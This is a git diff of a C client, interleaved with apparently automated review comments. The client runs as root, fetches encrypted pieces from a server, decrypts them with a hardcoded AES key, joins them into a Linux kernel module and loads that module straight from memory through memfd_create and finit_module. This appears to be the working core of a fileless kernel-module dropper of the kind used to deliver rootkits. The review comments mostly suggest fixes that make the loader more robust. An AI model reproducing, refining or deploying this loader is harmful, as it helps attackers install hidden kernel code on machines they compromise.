diff --git a/client/client b/client/client index b49feaf..9da6a16 100755 Binary files a/client/client and b/client/client differ diff --git a/client/include/cipher.h b/client/include/cipher.h index a356bfe..7ee6f78 100644 --- a/client/include/cipher.h +++ b/client/include/cipher.h @@ -14,10 +14,12 @@ #include typedef struct{ - unsigned char *decryptedtext; + unsigned char *decrypted_text; size_t text_size; -} decrypted; +} decrypted_t; -decrypted *decrypt_fraction(fraction_t *fraction); +decrypted_t *decrypt_fraction(fraction_t *fraction); char *generate_publickey(void); +void decrypted_free(decrypted_t *decrypted); + #endif diff --git a/client/include/load.h b/client/include/load.h index 6703306..56e8e48 100644 --- a/client/include/load.h +++ b/client/include/load.h @@ -1,18 +1,16 @@ +#include #define _GNU_SOURCE #include +#include +#include #include #include -#include -#include -#include -#include #include +#include -#include "../include/log.h" #include "../include/cipher.h" +#include "../include/log.h" -int load_lkm(const unsigned char* lkm, ssize_t total_size); -int is_lkm_loaded(const char *name); -int remove_lkm(); -int create_lkm(int num_links,fraction_t *fractions); +uint8_t *decrypt_lkm(fraction_t *fractions, int fractions_count, ssize_t *len); +int load_lkm(const uint8_t *lkm, ssize_t total_size); diff --git a/client/src/cipher.c b/client/src/cipher.c index db39723..2b82325 100644 --- a/client/src/cipher.c +++ b/client/src/cipher.c 
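Review bot: In client/include/load.h the newly added first `#include` line sits above `#define _GNU_SOURCE`, so if that header is a system header the feature-test macro is defined too late to affect it or anything it pulls in. Move `#define _GNU_SOURCE` to the very top of the header, or pass `-D_GNU_SOURCE` from the build, so every later header sees it. client/src/load.c has the same problem: it adds `#define _GNU_SOURCE` after including load.h. The header names are not visible in this view, so which header is affected is an assumption.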
@@ -2,88 +2,98 @@ #include "../include/fraction.h" #include #include +#include -decrypted decryptedstr; - -void handleErrors(void) -{ - ERR_print_errors_fp(stderr); - abort(); +static void handle_errors(void) { + ERR_print_errors_fp(stderr); + abort(); } -int decrypt(unsigned char *ciphertext, int ciphertext_len, unsigned char *key, +static int decrypt(unsigned char *ciphertext, int ciphertext_len, unsigned char *key, unsigned char *iv, unsigned char *plaintext) { - EVP_CIPHER_CTX *ctx; - int len; - int plaintext_len; + EVP_CIPHER_CTX *ctx; + int len; + int plaintext_len; - if (!(ctx = EVP_CIPHER_CTX_new())) - handleErrors(); + if (!(ctx = EVP_CIPHER_CTX_new())) + handle_errors(); - if (1 != EVP_DecryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv)) - handleErrors(); + if (1 != EVP_DecryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv)) + handle_errors(); - if (1 != EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, ciphertext_len)) - handleErrors(); - plaintext_len = len; + if (1 != EVP_DecryptUpdate(ctx, plaintext, &len, ciphertext, ciphertext_len)) + handle_errors(); + plaintext_len = len; - if (1 != EVP_DecryptFinal_ex(ctx, plaintext + len, &len)) - handleErrors(); - plaintext_len += len; + if (1 != EVP_DecryptFinal_ex(ctx, plaintext + len, &len)) + handle_errors(); + plaintext_len += len; - EVP_CIPHER_CTX_free(ctx); + EVP_CIPHER_CTX_free(ctx); - return plaintext_len; + return plaintext_len; } -decrypted *decrypt_fraction(fraction_t *fraction){ + +decrypted_t *decrypt_fraction(fraction_t *fraction) { size_t decrypted_size; - unsigned char key[32] = { - 0x6d, 0x46, 0x75, 0x32, 0x4c, 0x2f, 0x69, 0x34, 0x78, 0x65, 0x76, 0x4a, - 0x34, 0x4e, 0x33, 0x36, 0x72, 0x44, 0x74, 0x35, 0x35, 0x5a, 0x4f, 0x34, - 0x35, 0x4b, 0x63, 0x72, 0x6e, 0x30, 0x75, 0x57 -}; + unsigned char key[32] = {0x6d, 0x46, 0x75, 0x32, 0x4c, 0x2f, 0x69, 0x34, + 0x78, 0x65, 0x76, 0x4a, 0x34, 0x4e, 0x33, 0x36, + 0x72, 0x44, 0x74, 0x35, 0x35, 0x5a, 0x4f, 0x34, + 0x35, 0x4b, 0x63, 0x72, 0x6e, 0x30, 
0x75, 0x57}; + + unsigned char *decrypted_text = malloc(fraction->data_size); + + if (decrypted_text == NULL) { + log_error("Cannot assign memory for the decrypted text"); + return NULL; + } - unsigned char *decryptedtext = malloc(fraction->data_size+1); + decrypted_size = decrypt((unsigned char *)fraction->data, fraction->data_size, + key, (unsigned char *)fraction->iv, decrypted_text); - if (decryptedtext == NULL) { - fprintf(stderr, "Cannot assign memory for the decrypted text.\n"); - return NULL; - } + decrypted_t *decr = malloc(sizeof(decrypted_t)); - decrypted_size = decrypt((unsigned char*)fraction->data, fraction->data_size, key, (unsigned char*) fraction->iv, decryptedtext); + if (decr == NULL) { + log_error("Could not allocate memory for decrypted struct"); + return NULL; + } - decryptedstr.decryptedtext = decryptedtext; - decryptedstr.text_size = decrypted_size; + decr->decrypted_text = decrypted_text; + decr->text_size = decrypted_size; + return decr; +} - return &decryptedstr; +void decrypted_free(decrypted_t *decrypted) { + free(decrypted->decrypted_text); + free(decrypted); } -char *generate_publickey(void){ +char *generate_publickey(void) { EVP_PKEY *pkey = NULL; EVP_PKEY_CTX *pctx = NULL; pctx = EVP_PKEY_CTX_new_from_name(NULL, "RSA", NULL); - if(pctx == NULL){ - handleErrors(); + if (pctx == NULL) { + handle_errors(); return NULL; } - if(EVP_PKEY_keygen_init(pctx) <= 0){ - handleErrors(); + if (EVP_PKEY_keygen_init(pctx) <= 0) { + handle_errors(); EVP_PKEY_CTX_free(pctx); return NULL; } - if(EVP_PKEY_CTX_set_rsa_keygen_bits(pctx, 2048) <= 0){ - handleErrors(); + if (EVP_PKEY_CTX_set_rsa_keygen_bits(pctx, 2048) <= 0) { + handle_errors(); EVP_PKEY_CTX_free(pctx); return NULL; } - if(EVP_PKEY_generate(pctx, &pkey) <= 0){ - handleErrors(); + if (EVP_PKEY_generate(pctx, &pkey) <= 0) { + handle_errors(); EVP_PKEY_CTX_free(pctx); return NULL; } 
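Review bot: In decrypt_fraction the new `decr == NULL` branch returns without releasing `decrypted_text`, so the plaintext buffer leaks whenever the struct allocation fails; add `free(decrypted_text);` before that `return NULL;`. The buffer is now `malloc(fraction->data_size)` with the former `+ 1` dropped, while OpenSSL's documentation asks for room for the input length plus one cipher block on EVP_DecryptUpdate, so `malloc(fraction->data_size + EVP_MAX_BLOCK_LENGTH)` is the safer size. `fraction->data_size` is also passed to the `int ciphertext_len` parameter, so a length above INT_MAX would be truncated and should be rejected first. decrypted_free dereferences its argument unconditionally; an `if (decrypted == NULL) return;` guard would make it behave like free().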
@@ -91,17 +101,18 @@ char *generate_publickey(void){ BIO *bio = BIO_new(BIO_s_mem()); - if(PEM_write_bio_PUBKEY(bio,pkey) <= 0){ - handleErrors(); + if (PEM_write_bio_PUBKEY(bio, pkey) <= 0) { + handle_errors(); EVP_PKEY_free(pkey); BIO_free(bio); return NULL; } char *pem_key = NULL; - long pem_len = BIO_get_mem_data(bio,&pem_key); - + long pem_len = BIO_get_mem_data(bio, &pem_key); + char *copy = malloc(pem_len); + memcpy(copy, pem_key, pem_len); BIO_free(bio); -return pem_key; + return copy; } diff --git a/client/src/fraction.c b/client/src/fraction.c index 3a17285..bebee40 100644 --- a/client/src/fraction.c +++ b/client/src/fraction.c @@ -9,13 +9,13 @@ int download_fraction(int sfd, char *url, fraction_t *fraction) { // Parse the URL to get the path path = get_path_from_url(url); if (!path) { - log_error("Invalid URL: %s\n", url); + log_error("Invalid URL: %s", url); return 1; } // Perform the HTTP GET request if (http_get(sfd, path, &res) != HTTP_SUCCESS) { - log_error("Failed to download: %s\n", url); + log_error("Failed to download: %s", url); return 1; } @@ -45,7 +45,7 @@ int fraction_parse(char *data, size_t size, fraction_t *fraction) { // Ensure the data size is sufficient if (size < HEADER_SIZE) { - log_error("Insufficient size: %lu\n", size); + log_error("Insufficient size: %lu", size); return 1; } @@ -59,7 +59,7 @@ int fraction_parse(char *data, size_t size, fraction_t *fraction) { // Check the magic number if (!check_magic(magic)) { - log_error("Wrong magic number: %02x\n", magic); + log_error("Wrong magic number: %02x", magic); return 1; } @@ -67,7 +67,7 @@ int fraction_parse(char *data, size_t size, fraction_t *fraction) { data_size = size - HEADER_SIZE; fraction->data = malloc(data_size); if (!fraction->data) { - log_error("Failed to allocate data for fraction\n"); + log_error("Failed to allocate data for fraction"); return 1; } // Set the extracted values in the fraction structure 
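Review bot: In generate_publickey, `malloc(pem_len)` is used unchecked and the copy is not NUL-terminated, yet the function returns a bare `char *` with no length, so any caller that treats it as a string reads past the buffer. Allocate one extra byte, check the result and terminate the copy, as in the block below. `pkey` also appears not to be released on the success path in the visible lines. The function starts outside this hunk, so confirm against the full body before adding the final `EVP_PKEY_free`.

```c
  char *pem_key = NULL;
  long pem_len = BIO_get_mem_data(bio, &pem_key);
  if (pem_len <= 0) {
    EVP_PKEY_free(pkey);
    BIO_free(bio);
    return NULL;
  }

  char *copy = malloc((size_t)pem_len + 1);
  if (copy == NULL) {
    EVP_PKEY_free(pkey);
    BIO_free(bio);
    return NULL;
  }
  memcpy(copy, pem_key, (size_t)pem_len);
  copy[pem_len] = '\0'; /* BIO memory is not NUL-terminated; callers get a C string */

  BIO_free(bio);
  EVP_PKEY_free(pkey);
  return copy;
```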
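Review bot: `log_error("Insufficient size: %lu", size);` in fraction_parse passes a `size_t` to `%lu`, which is a mismatched conversion on any target where `size_t` is not `unsigned long`; use `log_error("Insufficient size: %zu", size);`. While these format strings are being edited, also check `%02x` in the magic-number message against the declared type of `magic`, which is not visible in these hunks. fraction_parse's body continues outside the hunk.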
diff --git a/client/src/http.c b/client/src/http.c index 14639c9..29f9de6 100644 --- a/client/src/http.c +++ b/client/src/http.c @@ -199,12 +199,12 @@ int http_get(int sfd, const char *path, http_res_t *res) { req_buf_len = strlen(request_buf); if (send_request(sfd, request_buf) < 0) { - log_error("Error: failed to send request\n"); + log_error("Error: failed to send request"); err = HTTP_SOCKET_ERR; goto error; } - log_debug("Sent GET request\n"); + log_debug("Sent GET request"); res->request = malloc(req_buf_len + 1); if (res->request == NULL) { diff --git a/client/src/load.c b/client/src/load.c index 7b0a58b..0c7c3e4 100644 --- a/client/src/load.c +++ b/client/src/load.c 
@@ -1,109 +1,87 @@ #include "../include/load.h" #include "../include/cipher.h" +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include -int remove_lkm(){ +#include +#include - char command[10] = "rmmod lkm"; +uint8_t *decrypt_lkm(fraction_t *fractions, int fractions_count, ssize_t *len) { - int result = system(command); - if(result == -1){ - log_error("Error executing rmmod"); - return -1; - } - return WEXITSTATUS(result); -} - -int is_lkm_loaded(const char* name){ - - DIR *dir = opendir("/sys/module/"); - - if(!dir){ - log_error("Error opening the /sys/module directory"); - return -1; - } - - struct dirent *entry; - - while ((entry = readdir(dir)) != NULL){ - if(strcmp(entry->d_name, name) == 0){ - closedir(dir); - puts("Module already loaded!"); - return 1; - } - } - - closedir(dir); - return 0; - -} - -int load_lkm(const unsigned char *lkm,ssize_t total_size){ - - int fdlkm = memfd_create("lkmmod", 0); - if (fdlkm < 0) { - log_error("memfd_create failed"); - return -1; - } - ssize_t written_bytes = write(fdlkm, lkm, total_size); - if (written_bytes < 0) { - log_error("Error writing to memfd"); - close(fdlkm); - return -1; - } else if (written_bytes != total_size) { - log_error("Incomplete write to memfd (Expected %zu, wrote %zd)\n)", total_size, written_bytes); - close(fdlkm); - return -1; - } - if (syscall(SYS_finit_module, fdlkm, "", 0) != 0) { - log_error("Failed to init module"); - close(fdlkm); - return -1; - } - - printf("Module loaded successfully\n"); - close(fdlkm); - - return 0; -} - -int create_lkm(int num_links,fraction_t *fractions){ - - unsigned char *module = NULL; + uint8_t *module = NULL; ssize_t total_size = 0; ssize_t module_size = 0; - decrypted *decrstr; + decrypted_t *decr; - for (int i = 0; i < num_links; i++) { - - decrstr = decrypt_fraction( &fractions[i]); - if (decrstr -> decryptedtext == NULL) { + for (int i = 0; i < fractions_count; i++) { + decr = decrypt_fraction(&fractions[i]); + if (decr == NULL) { 
log_error("Decryption process failed"); - return -1; + return NULL; } + if (module == NULL) { - total_size = decrstr -> text_size; + total_size = decr->text_size; module = malloc(total_size); if (module == NULL) { log_error("Error in memory assigning"); - return -1; + decrypted_free(decr); + return NULL; } - } else if (module_size + decrstr -> text_size > total_size) { - total_size += decrstr -> text_size; - unsigned char * tmp = realloc(module, total_size); + } else { + total_size += decr->text_size; + uint8_t *tmp = realloc(module, total_size); if (tmp == NULL) { log_error("Memory reallocation failed"); - return -1; + free(module); + decrypted_free(decr); + return NULL; } module = tmp; } - memcpy(module + module_size, decrstr -> decryptedtext, decrstr -> text_size); - module_size += decrstr -> text_size; + memcpy(module + module_size, decr->decrypted_text, decr->text_size); + module_size += decr->text_size; + + decrypted_free(decr); } - if(load_lkm(module, total_size) < 0){ - log_error("There was an error loading the LKM"); + *len = module_size; + return module; +} + +int load_lkm(const uint8_t *lkm, ssize_t total_size) { + + int fdlkm = syscall(SYS_memfd_create, "lkmmod", 0); + if (fdlkm < 0) { + log_error("memfd_create failed"); + return -1; + } + + ssize_t written_bytes = write(fdlkm, lkm, total_size); + if (written_bytes < 0) { + log_error("Error writing to memfd"); + close(fdlkm); + return -1; + } else if (written_bytes != total_size) { + log_error("Incomplete write to memfd (Expected %zu, wrote %zd)", + total_size, written_bytes); + close(fdlkm); + return -1; } + if (syscall(SYS_finit_module, fdlkm, "", 0) != 0) { + log_error("Failed to init module"); + close(fdlkm); + return -1; + } + + log_debug("Module loaded successfully"); + close(fdlkm); return 0; } diff --git a/client/src/main.c b/client/src/main.c index 68251f4..ac1fed6 100644 --- a/client/src/main.c +++ b/client/src/main.c 
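Review bot: In decrypt_lkm the `decr == NULL` branch returns NULL without freeing `module`, so every fraction already concatenated leaks when a later one fails to decrypt; add `free(module);` before that `return NULL;`, as the realloc-failure branch already does. In load_lkm the incomplete-write message formats `total_size`, an `ssize_t`, with `%zu`; `%zd` matches the type. `total_size += decr->text_size` mixes `ssize_t` with `size_t` and has no overflow check before the realloc. For anyone assessing this loader, note that the bytes handed to `finit_module` have no integrity check beyond unauthenticated AES-CBC under a key embedded in cipher.c.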
@@ -4,18 +4,16 @@ #include "../include/fraction.h" #include "../include/http.h" +#include "../include/load.h" +#include "../include/log.h" #include "../include/sock.h" #include "../include/utils.h" -#include "../include/log.h" -#include "../include/load.h" - #define SERVER_IP "127.0.0.1" #define SERVER_PORT "8000" -#define SYS_init_module __NR_init_module /* Helper functions to assist with cleanup, I hate cleanup */ -static void cleanup_char_array(char **array, int n_elem) { +static void cleanup_string_array(char **array, int n_elem) { for (int i = 0; i < n_elem; i++) { free(array[i]); } @@ -36,10 +34,11 @@ int main(void) { http_res_t http_post_res = {0}; char **fraction_links = NULL; fraction_t *fractions = NULL; - int module; + uint8_t *module = NULL; + ssize_t module_size; - if(geteuid() != 0){ - fprintf(stderr,"This program needs to be run as root!\n"); + if (geteuid() != 0) { + log_error("This program needs to be run as root!\n"); exit(1); } @@ -59,22 +58,29 @@ int main(void) { } freeaddrinfo(ainfo); - if (http_post(sfd, "/aeskey","text/plain",generate_publickey(),&http_post_res) != HTTP_SUCCESS) { - log_error("Failed to send RSA Public Key\n"); - goto cleanup; - } + //if (http_post(sfd, "/aeskey", "text/plain", generate_publickey(), + // &http_post_res) != HTTP_SUCCESS) { + // log_error("Failed to send RSA Public Key\n"); + // goto cleanup; + //} + if (http_get(sfd, "/", &http_fraction_res) != HTTP_SUCCESS) { log_error("Failed to retrieve fraction links\n"); goto cleanup; } + log_debug("Retrieved fraction links"); + int num_links = count_lines(http_fraction_res.data) + 1; - fraction_links = calloc(num_links,sizeof(char *)); + log_debug("%d links found", num_links); + + fraction_links = calloc(num_links, sizeof(char *)); if (!fraction_links) { log_error("Failed to allocate memory for fraction links\n"); goto cleanup; } + int lines_read = split_fraction_links(http_fraction_res.data, fraction_links, num_links); if (lines_read < 0) { 
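Review bot: The new `log_error("This program needs to be run as root!\n");` in main keeps a trailing newline while this commit strips it from the log calls in fraction.c and http.c; drop the `\n` here and in the other main.c messages so the output is consistent. `ssize_t module_size;` is declared without an initializer next to `module = NULL`; `ssize_t module_size = 0;` avoids reading an indeterminate value on an early `goto cleanup`. main's body continues outside this hunk.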
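Review bot: The `http_post(sfd, "/aeskey", ...)` call in main is commented out rather than removed, which leaves dead code in the file and `http_post_res` apparently declared only for cleanup. Delete the block or put it behind a build option. If it is restored, note that generate_publickey() now returns a heap copy, so the result has to be stored, NULL-checked and freed rather than passed inline as the commented code does. main's body starts and ends outside this hunk.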
@@ -82,7 +88,6 @@ int main(void) { goto cleanup; } - fractions = malloc(lines_read * sizeof(fraction_t)); if (!fractions) { log_error("Failed to allocate memory for fractions\n"); @@ -103,21 +108,32 @@ int main(void) { log_error("Fractions check failed\n"); goto cleanup; } - log_info("Verified fractions"); + log_info("Verified fractions"); - for (int i=0; i